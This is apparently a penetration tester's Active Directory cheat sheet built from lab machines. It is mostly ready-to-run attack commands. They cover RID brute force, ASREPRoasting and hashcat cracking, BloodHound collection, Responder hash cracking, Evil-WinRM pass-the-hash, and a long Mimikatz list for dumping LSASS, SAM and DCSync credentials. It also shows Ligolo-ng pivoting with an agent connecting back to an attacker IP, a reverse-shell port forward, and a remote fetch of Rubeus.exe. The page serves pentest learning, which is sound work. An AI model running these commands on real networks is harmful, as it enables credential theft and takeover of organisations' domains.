# Initial Access

## Password Spraying

### Password Spraying via Sprayhound
- Checks the `badPwdCount` attribute against the domain password policy only.
## RID Brute Force via SMB

Requires: guest read access to the `IPC$` (Remote IPC) SMB share.

```bash
# Enumerate domain SIDs/RIDs over SMB as the guest account and save the output
nxc smb 10.10.10.192 -u 'guest' -p '' --rid-brute > sid.txt

# Extract account names: take the text after the RID's colon, keep the first word (DOMAIN\name),
# then strip the "DOMAIN\" prefix (replace DOMAIN with the NetBIOS domain name, e.g. BLACKFIELD)
cat sid.txt | awk -F': ' '{print $2}' | awk '{print $1}' | sed 's/DOMAIN\\//' > users.txt

# Request AS-REP hashes for accounts with Kerberos pre-authentication disabled (ASREPRoasting);
# -outputfile writes them to creds.txt in hashcat format
GetNPUsers.py [DOMAIN]/ -usersfile users.txt -format hashcat -dc-ip 10.10.10.192 -outputfile creds.txt

# Crack the AS-REP hashes (mode 18200 = Kerberos 5 AS-REP etype 23)
hashcat -m 18200 creds.txt /usr/share/wordlists/rockyou.txt
```
## LDAP Enumeration

```bash
# Anonymous bind, base scope: list the naming contexts (domain contexts)
ldapsearch -x -H ldap://BLACKFIELD -s base namingcontexts

# Authenticated bind: search all user objects
ldapsearch -x -H ldap://BLACKFIELD -D 'CN=support,CN=users,DC=BLACKFIELD,DC=local' -W -b 'DC=BLACKFIELD,DC=local' '(objectClass=user)'

# Find accounts configured for constrained delegation
ldapsearch -H ldap://192.168.110.55 -x -D "web_svc@painters.htb" -W -b "dc=painters,dc=htb" "(msDS-AllowedToDelegateTo=*)" msDS-AllowedToDelegateTo
```
- Older tool, but useful when BloodHound.py isn't working as intended.
## SMB Enumeration

```bash
# List SMB shares and their permissions
nxc smb [IP] --shares
```
## Web Application Vulnerabilities
## Integrated DNS Dump

Any authenticated domain user can enumerate all DNS records in the Domain or Forest DNS zones over LDAP, similar to a zone transfer.
# Domain Enumeration

## Impacket (via Python)

- `GetADUsers.py`

## BloodHound

```bash
# Install and start BloodHound CE with Docker Compose
curl -L https://ghst.ly/getbhce | docker compose -f - up
```
```bash
# BloodHound.py collection with all collection methods
python3 bloodhound.py -u "support" -p "#00^BlackKnight" -c ALL -d BLACKFIELD.local -ns 10.10.10.192 -dc dc01.BLACKFIELD.local

# proxychains equivalent (DNS over TCP through the proxy)
proxychains bloodhound-python -u "web_svc" -d 'painters.htb' -dc 'dc.painters.htb' --dns-tcp -c ALL -v -ns 192.168.110.55
```
# Poisoning and Relay

## Responder

- IPv6/IPv4 LLMNR/NBT-NS/mDNS poisoner and NTLMv1/2 relay.

```bash
# Crack captured NTLMv2 hashes (mode 5600 = NetNTLMv2)
hashcat -m 5600 --force -a 0 responder.hashes /usr/share/wordlists/rockyou.txt

# Location of Responder
/opt/tools/Responder/
```
## SMB Relay
```bash
# Generate a list of hosts with SMB signing disabled
nxc smb [IP] --gen-relay-list relay.txt
```
# Local Privilege Escalation
# Lateral Movement

## Smbexec

## WinRM

### Evil-WinRM

Evil-WinRM - ultimate WinRM shell for hacking/pentesting.
```bash
gem install evil-winrm

# Password authentication
evil-winrm -i <IP> -u <username> -p <password>
# Pass the hash with the NTLM hash
evil-winrm -i <IP> -u <username> -H <ntlm hash>
# -k takes a private key path (certificate authentication); Kerberos authentication uses -r <realm> instead
evil-winrm -i <IP> -u <username> -k <private key>
```
#### Run PowerShell Commands

```powershell
whoami
ipconfig
Get-Process
```
#### Upload and Download Files

```text
upload /local/path/to/file /remote/path
download /remote/path/to/file /local/path
```
#### Run PowerShell Scripts

```text
upload /local/path/to/script.ps1 /remote/path/script.ps1
powershell -File /remote/path/script.ps1
```
## Mimikatz

```text
# Dump LSASS
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

# (Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

# List all available Kerberos tickets in memory
mimikatz sekurlsa::tickets

# Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

# Dump and save LSASS to a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

# List cached MasterKeys
mimikatz sekurlsa::dpapi

# List local Kerberos AES keys
mimikatz sekurlsa::ekeys

# Dump SAM database
mimikatz lsadump::sam

# Dump SECRETS database
mimikatz lsadump::secrets

# Inject and dump the Domain Controller's credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

# Dump the domain's credentials without touching the DC's LSASS, also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

# Dump old passwords and NTLM hashes of a user
mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history

# List and dump local Kerberos credentials
mimikatz kerberos::list /dump

# Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

# List TS/RDP sessions
mimikatz ts::sessions

# List Vault credentials
mimikatz vault::list
```
## Network Pivoting via Ligolo-ng

```bash
# On the compromised pivot host: connect the agent back to the attacker's proxy
./agent -connect 10.10.14.5:443 -ignore-cert

# On the attacker machine: start the proxy with a self-signed certificate
sudo ./proxy -selfcert -laddr 0.0.0.0:443 -v

# In the ligolo-ng proxy console: select the agent session and start the tunnel
session
start

# On the attacker machine: route the internal subnet through the ligolo interface
sudo ip route add 192.168.110.0/24 dev ligolo

# In the proxy console: open port 1234 on the DMZ machine and forward it to port 4444 on the attacker (for a reverse shell)
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444

# On an internal Windows host: fetch a file through a listener on the pivot host (192.168.110.51:1235)
powershell -Command "Invoke-WebRequest -Uri 'http://192.168.110.51:1235/Rubeus.exe' -OutFile 'Rubeus.exe'"
```
# Exfiltration (Domain Controller)

## Extraction of ntds.dit
# Exploitation of Monitoring Systems

- Zabbix Agent
- Scripts in Zabbix can be used to perform custom monitoring checks, collect and process data from external sources, and automate tasks based on monitoring events.
- Zabbix SSO bypass
# Active Directory Tools

```bash
# Install Rust
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env

# Install NetExec with pipx
pipx install git+https://github.com/Pennyw0rth/NetExec
```
## PowerView (Deprecated since 2021)

```powershell
# Dot-source the script into the current session
. .\powerview.ps1
# Or import it as a module
Import-Module C:\Temp\PowerView.ps1
```
```bash
# Nmap NSE scripts for SMB: OS discovery, share and user enumeration, known SMB vulnerabilities
nmap -p 445 --script 'smb-os-discovery,smb-enum-shares,smb-enum-users,smb-vuln*' [IP]
```
SMB tools:

- Enum4Linux
- SMBMap
- smbclient
- smbclient.py (Impacket)
- NetExec - Cheatsheet
- SMB Enumeration Cheatsheet
```bash
# Install Impacket
python3 -m pipx install impacket
```
- **PSExec**
  - Shell access via SMB shares (Pass the Hash)
- **GetNPUsers**
  - Kerberos pre-authentication disabled (ASREPRoasting)
```bash
# Kerberos authentication (-k) with the ticket in KRB5CCNAME, no password prompt (-no-pass)
smbclient.py -k -no-pass PAINTERS.HTB/Administrator@dc.painters.htb -debug
wmiexec.py -k -no-pass PAINTERS.HTB/Administrator@dc.painters.htb
# Sometimes the domain prefix is not needed
psexec.py -k -no-pass Administrator@dc.painters.htb -dc-ip 192.168.110.55 -debug
smbexec.py administrator@dc.painters.htb -k -no-pass -debug
```

- [smbexec](https://book.hacktricks.xyz/windows-hardening/lateral-movement/smbexec)
- Pywerview - Linux AD enumeration
- Empire - post-exploitation framework
# Article Information
- Author: Tony Wu
- URL: https://qwutony.github.io/wiki/003-active-directory-penetration-testing/
- License: Free to share - NonCommercial - NoDerivatives - Attribution required (Creative Commons BY-NC-ND 4.0 License)